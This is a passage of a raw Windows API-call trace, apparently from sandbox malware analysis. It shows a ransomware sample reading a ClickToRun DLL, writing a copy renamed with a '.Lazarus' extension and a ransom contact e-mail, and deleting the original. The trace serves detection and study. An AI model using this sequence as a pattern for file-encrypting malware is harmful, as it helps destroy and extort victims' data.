dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0090.934] AreFileApisANSI () returned 1 [0090.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0090.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 89 [0090.934] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0)) returned 1 [0090.934] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.934] AreFileApisANSI () returned 1 [0090.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.934] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0090.935] GetLastError () returned 0x0 [0090.935] SetLastError (dwErrCode=0x0) [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4df50 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c058 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d720 [0090.935] GetLastError () returned 0x0 [0090.935] SetLastError (dwErrCode=0x0) [0090.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a790 [0090.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x55f20 [0090.935] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0090.935] AreFileApisANSI () returned 1 [0090.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 151 [0090.935] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x12e) returned 0x4e568 [0090.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x55f20, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=151 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 151 [0090.935] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.936] GetFileType (hFile=0x360) returned 0x1 [0090.936] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0090.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0090.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0090.936] AreFileApisANSI () returned 1 [0090.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0090.936] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0090.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 89 [0090.936] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0090.937] GetFileType (hFile=0x33c) returned 0x1 [0090.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a630 [0090.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0090.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.937] GetLastError () returned 0x0 [0090.937] SetLastError (dwErrCode=0x0) [0090.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0090.937] GetLastError () returned 0x0 [0090.937] SetLastError (dwErrCode=0x0) [0090.937] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0090.937] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0090.942] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.942] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0090.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0090.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0090.945] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0090.945] GetLastError () returned 0x0 [0090.945] SetLastError (dwErrCode=0x0) [0090.945] GetLastError () returned 0x0 [0090.945] SetLastError (dwErrCode=0x0) [0090.945] GetLastError () returned 0x0 [0090.945] SetLastError (dwErrCode=0x0) [0090.945] GetLastError () returned 0x0 [0090.945] SetLastError (dwErrCode=0x0) [0090.945] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.073] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.074] GetLastError () returned 0x0 [0091.074] SetLastError (dwErrCode=0x0) [0091.074] GetLastError () returned 0x0 [0091.074] SetLastError (dwErrCode=0x0) [0091.074] GetLastError () returned 0x0 [0091.074] SetLastError (dwErrCode=0x0) [0091.074] GetLastError () returned 0x0 [0091.074] SetLastError (dwErrCode=0x0) [0091.074] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.074] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.077] GetLastError () returned 0x0 [0091.077] SetLastError (dwErrCode=0x0) [0091.078] GetLastError () returned 0x0 [0091.078] SetLastError (dwErrCode=0x0) [0091.078] GetLastError () returned 0x0 [0091.078] SetLastError (dwErrCode=0x0) [0091.078] GetLastError () returned 0x0 [0091.078] SetLastError (dwErrCode=0x0) [0091.078] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.078] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.078] GetLastError () returned 0x0 [0091.079] SetLastError (dwErrCode=0x0) [0091.079] GetLastError () returned 0x0 [0091.079] SetLastError (dwErrCode=0x0) [0091.079] GetLastError () returned 0x0 [0091.079] SetLastError (dwErrCode=0x0) [0091.079] GetLastError () returned 0x0 [0091.079] SetLastError (dwErrCode=0x0) [0091.079] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0091.079] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.079] GetLastError () returned 0x0 [0091.079] SetLastError (dwErrCode=0x0) [0091.079] GetLastError () returned 0x0 [0091.079] SetLastError (dwErrCode=0x0) [0091.080] GetLastError () returned 0x0 [0091.080] SetLastError (dwErrCode=0x0) [0091.080] GetLastError () returned 0x0 [0091.080] SetLastError (dwErrCode=0x0) [0091.080] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x2c0, lpOverlapped=0x0) returned 1 [0091.080] ReadFile (in: hFile=0x33c, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0091.080] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0091.080] GetLastError () returned 0x0 [0091.080] SetLastError (dwErrCode=0x0) [0091.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0091.081] WriteFile (in: hFile=0x360, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x2c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327ef70*=0x2c0, lpOverlapped=0x0) returned 1 [0091.081] GetLastError () returned 0x0 [0091.081] SetLastError (dwErrCode=0x0) [0091.081] GetLastError () returned 0x0 [0091.081] SetLastError (dwErrCode=0x0) [0091.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0091.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0091.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0091.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0091.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0091.081] CloseHandle (hObject=0x360) returned 1 [0091.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0091.083] CloseHandle (hObject=0x33c) returned 1 [0091.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0091.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0091.083] AreFileApisANSI () returned 1 [0091.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0091.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0091.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 89 [0091.083] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0091.084] GetFileType (hFile=0x33c) returned 0x1 [0091.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8f448 [0091.085] GetLastError () returned 0xb7 [0091.085] SetLastError (dwErrCode=0xb7) [0091.085] WriteFile (in: hFile=0x33c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0091.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0091.086] CloseHandle (hObject=0x33c) returned 1 [0091.086] AreFileApisANSI () returned 1 [0091.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0091.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x4ebc8 [0091.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x4ebc8, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 89 [0091.086] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll")) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c058 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0091.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0091.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.088] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0091.088] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-utility-l1-1-0.dll", cAlternateFileName="AP80F4~1.DLL")) returned 1 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0091.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0091.088] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 